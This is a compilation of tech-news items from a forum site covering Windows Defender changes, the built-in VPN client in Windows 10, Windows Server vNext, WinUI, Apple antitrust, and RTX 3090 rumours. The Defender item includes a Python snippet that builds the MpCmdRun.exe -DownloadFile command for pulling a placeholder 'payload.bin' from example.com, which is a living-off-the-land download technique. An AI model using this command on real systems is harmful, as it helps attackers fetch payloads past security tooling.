
Recently, it was discovered that Microsoft is no longer allowing consumers to disable the Windows Defender antivirus tool via the Windows Registry. Microsoft originally remained tight-lipped on the changes made to Windows 10’s antivirus tool, but the company has now shared more details on the controversy. Microsoft again confirmed that it has retired ‘DisableAntiSpyware’ to prevent users from disabling Windows Defender via the Windows Registry. However, Microsoft says it retired the legacy option because it no longer makes sense in the latest version of Defender. Windows Defender is designed to turn itself off automatically whenever users install another antivirus product, so it doesn’t really make sense to disable Windows 10’s built-in protection tool manually, according to Microsoft. ‘DisableAntiSpyware’ was intended only for IT pros and admins to disable the antivirus engine when deploying their own security product. “The impact of the DisableAntiSpyware removal is limited to Windows 10 versions prior to 1903 using Microsoft Defender Antivirus. This change does not impact third party antivirus connections to the Windows Security app. Those will still work as expected,” Microsoft noted. By retiring this setting, Microsoft also prevents attackers from turning off Windows Defender. Separately, a report suggests that Windows 10’s built-in antivirus software ‘Windows Defender’ has gained a new feature that could be abused by attackers to download malware from the internet. According to security researcher Askar, a download option has been added to Windows Defender’s command-line tool “MpCmdRun.exe”, otherwise known as the Microsoft Antimalware Service Command Line Utility. Askar claims that this change to the Windows Defender-powered command-line tool could be abused by attackers as a living-off-the-land binary (LOLBin). 
In other words, hackers can abuse the binary to download any file from the internet, including malware. It also means that users can use Windows Defender itself to download any file from the internet. This is unlikely to be a major security flaw, as files are still checked by Windows Defender after the download completes via the command-line tool. In theory, the Windows Defender tool can't be used to download malware that would then infect your system, but this is an odd change, and security researchers believe it could still be abused. Details are posted on OUR FORUM.
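As a sketch of what the reported abuse looks like: the URL and paths below are placeholders, and MpCmdRun.exe only ships with Windows, so this snippet merely assembles and prints the download command rather than running it.

```python
# Illustrative only: build the MpCmdRun.exe download invocation that
# researcher Askar reported. URL and destination are placeholders;
# the binary exists only on Windows, so we just print the command.
mpcmdrun = r"C:\Program Files\Windows Defender\MpCmdRun.exe"
url = "https://example.com/payload.bin"     # any remote file
dest = r"C:\Users\Public\payload.bin"       # where the file is saved

cmd = [mpcmdrun, "-DownloadFile", "-url", url, "-path", dest]
print(" ".join(cmd))
```

Because the downloaded file is still scanned by Defender, known malware would be quarantined immediately, which is why the article calls this change odd rather than catastrophic.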

If you've kept on top of the latest Windows 10 developments, you may have spotted the Windows 10 VPN client's existence. Its very name sounds super promising, suggesting you don't need a dedicated VPN solution and can simply flick it on any time you need added protection and security. Dig a little deeper, however, and you may be disappointed by what the built-in VPN client means for you. While the built-in client is likely enough for some people, others will be looking for more from it. Read on and we'll tell you everything you need to know about the Windows 10 VPN and whether it's worth using. You see the words 'VPN client,' and you think it'll solve all your VPN needs, right? Well, the Windows 10 VPN client isn't really a VPN service of its own. Effectively, it's a desktop client that helps you connect to a third-party VPN network. Yup, it's basically a container. You'll still need to subscribe to a 'proper' VPN service to take advantage of the Windows 10 VPN client. This does mean that you won't need to download any additional software, which will make some people happy. But are the feature trade-offs worth it when you could just download the VPN's own client instead? Well, let's keep looking at what the Windows 10 client offers. Once you've hooked up your full VPN service with the Windows 10 VPN client, you might think it's plain sailing from there. Unfortunately, there are some further restrictions. You have to set up a connection profile to use it, and each profile only has room for one server address and one connection protocol. If you like to switch between different servers regularly through your VPN, this immediately restricts your options unless you keep creating new profiles. We'll be blunt - the Windows 10 built-in VPN client isn't great for everyone. 
It needs a bit of technical knowledge, as it asks you about protocol choices and other settings that most VPN service clients don't bother asking about anymore. They're far more intuitive and user-friendly than the Windows option. There's also the matter of needing to set up yet another client when you've already just signed up for a VPN service. It feels like an unnecessary step because it is. The Windows 10 VPN client is super rudimentary. It looks like one of the more technical corners of Windows, whereas numerous VPN apps look far more attractive. At their simplest, VPN service clients tend to include maps that help you pick which location's server you want to connect to, but they also offer extra features that can be very useful. We've said many negative things about the Windows 10 built-in VPN client, and for good reason. For most users, it's simply pointless. If you've just signed up for a VPN service, it makes far more sense to use the VPN's dedicated app to connect and switch between servers. It's simpler to use, and the full wealth of features the VPN offers is made available to you. There is an exception to this rule, though. If you're technically minded and keen to avoid the potential bloat of unnecessary apps, the Windows 10 VPN client does offer benefits. You don't need to install any extra apps to connect to your chosen VPN, which is useful if you have limited space, or if your system is very low-spec and needs all the help it can get to keep running smoothly. Complete details are posted on OUR FORUM.
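A toy sketch (plain Python, not any real Windows API; the profile and server names are invented) of the restriction described above: each built-in connection profile stores exactly one server address and one protocol, so every additional server means creating another profile.

```python
# Toy model of the Windows 10 built-in client's connection profiles
# (illustrative only, not the real Windows API): one server address
# and one tunnel protocol per profile.
profiles = {}

def add_profile(name, server_address, tunnel_protocol):
    profiles[name] = {"server": server_address, "protocol": tunnel_protocol}

# Switching between two servers of the same service needs two profiles:
add_profile("ExampleVPN-UK", "uk1.example-vpn.com", "IKEv2")
add_profile("ExampleVPN-US", "us3.example-vpn.com", "IKEv2")
print(len(profiles))  # two profiles for two servers
```

A dedicated VPN app hides exactly this bookkeeping behind its server list, which is the convenience trade-off the article describes.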

Today we are excited to release a new build of the Windows Server vNext Long-Term Servicing Channel (LTSC) release that contains both the Desktop Experience and Server Core installation options for Datacenter and Standard editions. There are some features to look for, such as UDP performance improvements — UDP is becoming a very popular protocol, carrying more and more networking traffic. With the QUIC protocol built on top of UDP, and the increasing popularity of RTP and custom UDP streaming and gaming protocols, it is time to bring the performance of UDP to a level on par with TCP. In Server vNext we include the game-changing UDP Segmentation Offload (USO). USO moves most of the work required to send UDP packets from the CPU to the NIC's specialized hardware. Complementing USO, Server vNext includes UDP Receive Side Coalescing (UDP RSC), which coalesces packets and reduces CPU usage for UDP processing. To go along with these two enhancements, we have made hundreds of improvements to the UDP data path, both transmit and receive. TCP performance improvements — Server vNext uses TCP HyStart++ to reduce packet loss during connection startup (especially in high-speed networks) and SendTracker + RACK to reduce Retransmit TimeOuts (RTOs). These features are enabled in the transport stack by default and provide a smoother network data flow with better performance at high speeds. PktMon support in TCPIP — the cross-component network diagnostics tool for Windows now has TCPIP support, providing visibility into the networking stack. PktMon can be used for packet capture, packet drop detection, packet filtering, and counting in virtualization scenarios like container networking and SDN. You're also likely to see improved RSC in the vSwitch. 
First released in Windows Server 2019, Receive Segment Coalescing (RSC) in the vSwitch enables packets to be coalesced and processed as one larger segment upon entry into the virtual switch. This greatly reduces the CPU cycles consumed processing each byte (cycles/byte). However, in its original form, once traffic exited the virtual switch, it would be re-segmented for travel across the VMBus. In Windows Server vNext, segments remain coalesced across the entire data path until processed by the intended application. There are also new affinity rules that let you keep things together or apart. When moving a role, the affinity object ensures that it can be moved; it also looks for other associated objects, including disks, and verifies those as well, so you can have storage affinity between virtual machines (or roles) and Cluster Shared Volumes if desired. You can add multiple roles to a rule - domain controllers, for example. You can set an anti-affinity rule so that the DCs remain in different fault domains, then set an affinity rule tying each DC to its specific CSV drive so they stay together. If you have SQL Server VMs that need to sit in each site with a specific DC, you can set a same-fault-domain affinity rule between each SQL VM and its respective DC. Because the rule is now a cluster object, if you try to move a SQL VM from one site to another, the cluster checks all objects associated with it. It sees there is a pairing with the DC in the same site; it then sees that the DC has a rule and verifies it; it sees that this DC cannot be in the same fault domain as the other DC, so the move is disallowed. BitLocker has been available for Failover Clustering for quite some time, with the requirement that the cluster nodes all be in the same domain, as the BitLocker key is tied to the Cluster Name Object (CNO). However, for clusters at the edge, workgroup clusters, and multidomain clusters, Active Directory may not be present. 
With no Active Directory, there is no CNO, so these cluster scenarios had no data-at-rest security. Starting with this Windows Server Insider build, we introduce our own BitLocker key, stored locally (encrypted) for the cluster to use. This additional key is only created when the clustered drives are BitLocker-protected after cluster creation. Complete details are posted on OUR FORUM.
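The move-validation walk-through above can be sketched in a few lines. This is plain Python, not the real failover-cluster API, and the role and site names are invented; it only illustrates the rule-checking logic the article describes.

```python
# Sketch of the cluster move check: a role move is rejected when it would
# put two anti-affine roles in the same fault domain, or separate two
# roles an affinity rule says must stay together.
anti_affinity = {("DC1", "DC2")}    # keep the DCs in different fault domains
affinity = {("SQL1", "DC1")}        # keep SQL1 with its DC
placement = {"DC1": "Site-A", "DC2": "Site-B", "SQL1": "Site-A"}

def can_move(role, target):
    """Validate a proposed move against every rule the role appears in."""
    for a, b in anti_affinity:
        other = b if role == a else a if role == b else None
        if other and placement[other] == target:
            return False            # would collide with an anti-affine role
    for a, b in affinity:
        other = b if role == a else a if role == b else None
        if other and placement[other] != target:
            return False            # would separate roles that must stay together
    return True

print(can_move("DC1", "Site-B"))    # False: DC2 already lives in Site-B
print(can_move("SQL1", "Site-B"))   # False: SQL1 must stay with DC1 in Site-A
```

This mirrors the article's example: moving a SQL VM triggers verification of the paired DC's rules, and the DC-to-DC anti-affinity rule blocks the move.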

Windows 10’s Start Menu and Action Center could be refreshed with UI tweaks, if a new code reference spotted in the preview builds is anything to go by. On August 21, Microsoft published Windows 10 Build 20197 to testers in the Dev Channel of the Windows Insider program. This preview build comes with a new Disk Manager and bug fixes, but it also includes references to ‘WinUI’ for Windows 10’s Start Menu and Action Center. A scan of the Microsoft Program Database (PDB) files in Windows 10 Build 20197 suggests Microsoft is currently testing WinUI-based versions of these surfaces internally.
WinUI is Microsoft’s next-generation user interface platform for Windows 10, Windows 10X, and foldable devices like the Surface Duo. Microsoft has already confirmed that WinUI can be used to refresh Win32 apps and to create new Win32 or UWP apps using the new UI principles. The Start Menu, Action Center, and other modern shell elements are written in XAML and currently use UI components from “Windows.UI.XAML”. In theory, these references suggest that Microsoft might allow the Start Menu and Action Center to use UI components from WinUI as opposed to the current ‘Windows.UI.XAML’. Read more on OUR FORUM.

While both Apple and Google are in US and EU crosshairs, Apple is in a far more precarious position. Are iOS users ready for the pros and cons of opening Pandora's app box? This week, Apple reached a significant milestone in its nearly 45-year history: a valuation of over $2 trillion. It's the first American company to achieve that lofty status, surpassing the valuation of Saudi Aramco as a publicly traded firm. This comes only two years after reaching the $1 trillion mark, a milestone that its industry rivals Amazon, Microsoft, and Alphabet (Google) soon followed. But Apple's rise in valuation has placed the company under increased scrutiny and growing concerns about how it has been managing its developer ecosystem, notably its App Store. In May of last year, I discussed how the US Supreme Court paved the way for potential antitrust action by allowing a class-action suit against the company, alleging monopolistic practices in its App Store, to proceed. Although the ruling was not a judgment against Apple and the case was remanded to the lower courts -- the Court did not classify the company as a monopoly and did not impose any antitrust penalty -- the decision sets a potentially damaging precedent for the company. By allowing this lawsuit to move forward, the high court's ruling opened up the possibility that there could be, at some point, antitrust proceedings against the company. All signs indicate that antitrust litigation against the company is virtually inevitable -- especially if Cupertino continues to maintain the status quo of allowing only Apple-trusted applications in its App Store and not permitting third-party payment services for in-app transactions. In the last year, legal complaints against the company have increased, as have antitrust monitoring efforts by US and European regulators. 
In 2019, Spotify filed a complaint with the European Union, alleging that because Apple's own Music service isn't subject to the same 30% App Store transactional fees as third-party music services, Apple competes unfairly. Although Spotify subscriptions can be purchased outside the App Store via an out-of-band browser purchase (the same way other companies, such as Amazon, handle content purchases that bypass the App Store), Spotify argues that the 30% fee forces it to operate in an unfair environment if it wants to offer subscriptions directly in its iOS app. The complaint has resulted in the EU opening a formal investigation into Apple's App Store practices, though the EU has stated that it may take years to complete. In the past, the EU has fined American firms billions of dollars: its prior action against Microsoft over browser bundling in Windows resulted in the company building a "browser choice" screen into its operating system, and it levied a $5B fine against Google for anticompetitive behavior in tying its search engine to Android. All of this legal activity seemed to have been pushed to the back burner given the current political climate and priorities of the Trump administration; the upcoming US elections and the COVID-19 pandemic have proven to be effective distractions. But recently, Apple has again come under scrutiny over its interactions with Epic Games. Epic made changes to its popular Fortnite game to allow in-app transactions that do not go through Apple's App Store or Google's Play Store on iOS and Android, respectively. These changes resulted in the immediate removal of Fortnite from both the App Store and the Play Store, as well as a notification from Apple to Epic that its official developer accounts would be terminated at the end of the month for violating its developer agreements. 
Epic has since launched antitrust lawsuits against both Apple and Google, arguing that both companies are engaged in multiple violations of the Sherman Antitrust Act through monopolistic practices. While both Apple and Google are in US and EU crosshairs, it could be argued that Apple is in a much more precarious position: any antitrust action could create more significant issues for iOS end-users than for Android users. Why? Android can already side-load applications, including third-party app stores. This capability exists in case an end-user wants to install software that either doesn't conform to the Play Store's policies (such as adult content) or simply isn't listed in the Play Store for whatever reason. Additionally, Android is fully open source as part of the Android Open Source Project (AOSP), so there is full transparency when it comes to APIs. Only apps that use Google Mobile Services -- which are fully documented by the company and licensed to device manufacturers (such as Samsung and Microsoft) -- are considered proprietary. Complete details are posted on OUR FORUM.

The Nvidia GeForce RTX 3090 is the next-generation halo card from Team Green, and it's going to be a monster. The RTX 3090 is now confirmed as the next halo graphics card from Team Green, thanks to Micron's inadvertent posting of memory details (the PDF has since been removed). With that piece of knowledge, we've dissected the rest of what we expect to find in the RTX 3090. Nvidia has a countdown to the 21st anniversary of its first GPU, the GeForce 256, slated for September 1. The battle for the best graphics cards and the top of the GPU hierarchy is about to get heated. We've talked about Nvidia Ampere and the RTX 30-series as a whole elsewhere, so this discussion focuses purely on the GeForce RTX 3090: the expected GPU and memory specifications, release date, price, features, and more. First, the GeForce RTX 3090 branding is the first 90-series suffix we've seen since the GTX 690 back in 2012. That was a dual-GPU variant of the GTX 680, but based on the Micron documentation, the RTX 3090 will still be a single GPU. Spoiler: multi-GPU support in games is practically dead, or at least on life support. Why bring back the 90 branding? Simple: it opens the door for a new tier of performance and pricing. That's not good news for our wallets. We discussed Micron's inadvertent posting of details, and more, in a recent Tom's Hardware show. Let's dig into the details. The Micron posting gives us one extremely concrete set of data: unless Nvidia changes something between now and the unveiling, the GeForce RTX 3090 will have 12GB of GDDR6X memory clocked somewhere between 19 and 21 Gbps per pin. Let's be clear: it's 21Gbps. Nvidia's GTX 1080 Ti was the first 11GB GPU, and it was a surprise. Nvidia had multiple references to build off: turning the dial to 11, 11GB, 11Gbps clocks. The same applies to 21Gbps. 
This is the 21st anniversary of the GeForce 256, the "world's first GPU" according to Nvidia, which coined the GPU acronym for the occasion. There's also a 21-day countdown going on right now. Add that to the specs from Micron, and 21Gbps is effectively confirmed. If I'm wrong, I'll eat my GPU hat. This is a big deal, as it's the first time a GPU will have over 1TBps of memory bandwidth while using something other than HBM2 memory. (AMD's Radeon VII also has 1TBps, via 16GB of HBM2.) We don't have exact details on how much companies pay for HBM2 vs. GDDR6X, but there's a big premium with HBM2: you need a silicon interposer, plus the memory itself costs more. To put this in perspective, the RTX 2080 Ti 'only' has 616GBps, so this is effectively a 64% boost in memory bandwidth. That leads into the rest of the GPU specs, but let's first point out that the RTX 2080 Ti has 27% more memory bandwidth than the GTX 1080 Ti. It also has 20% more theoretical computational performance (TFLOPS), and architectural updates mean it makes better use of those resources. In short, GPU TFLOPS often scales similarly to bandwidth. As we've already pointed out, the move to 21Gbps GDDR6X increases raw memory bandwidth by 64% relative to the RTX 2080 Ti. That means we also expect the RTX 3090 to deliver around 50-75% more computational performance. Do you know what would make for a nice target? 21 TFLOPS. Yeah, baby! How it gets there isn't critical, but there are a few options. We know from the Nvidia A100 that Ampere can reach massive sizes on TSMC's 7nm process. The GA100 is an 826mm² die, which is relatively close to the maximum reticle size — you can't make a chip physically larger than the reticle. The GA100 at the heart of the A100 also supports FP64 (64-bit floating-point) computation, which is necessary for its target market of scientific research. GeForce cards don't need FP64 and typically only have 1/32 the performance in FP64 vs. 
FP32, instead of the 1/2 rate found in the bigger GP100, GV100, and GA100 chips. Option one is that Nvidia strips out all the FP64 functionality, adds ray tracing (RT) cores in its place, and still ends up with a big chip that has up to 128 SMs. This is more or less what happened with the Pascal generation: GP100 used HBM2 and GP102 used GDDR5/GDDR5X, but both had a maximum configuration of 3,840 FP32 CUDA cores. Some of these would end up disabled to improve yields via binning, but if Nvidia goes with 118 SMs and 7,552 CUDA cores and clocks the chip at 1.4GHz (boost), it would have a theoretical performance of 21.1 TFLOPS. Oh, and it would use around 50W more power. Learn more about this powerhouse GPU card by visiting OUR FORUM.
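The headline numbers above are easy to sanity-check with quick arithmetic, assuming a 384-bit memory bus (which 12GB of GDDR6X at 32 bits per chip implies) and two FP32 operations per CUDA core per clock (one fused multiply-add):

```python
# Memory bandwidth: 21Gbps per pin across an assumed 384-bit bus
per_pin_gbps = 21
bus_width_bits = 384
bandwidth = per_pin_gbps * bus_width_bits / 8      # GB/s
print(bandwidth)                                   # 1008.0, just over 1TBps

# Uplift over the RTX 2080 Ti's 616GBps
print(round(bandwidth / 616 - 1, 2))               # 0.64, i.e. ~64%

# Theoretical compute: 7,552 CUDA cores, 1.4GHz boost, 2 ops/core/clock
tflops = 7552 * 2 * 1.4 / 1000
print(round(tflops, 1))                            # 21.1 TFLOPS
```

Both the 64% bandwidth uplift and the 21.1 TFLOPS figure quoted in the article fall straight out of these assumptions.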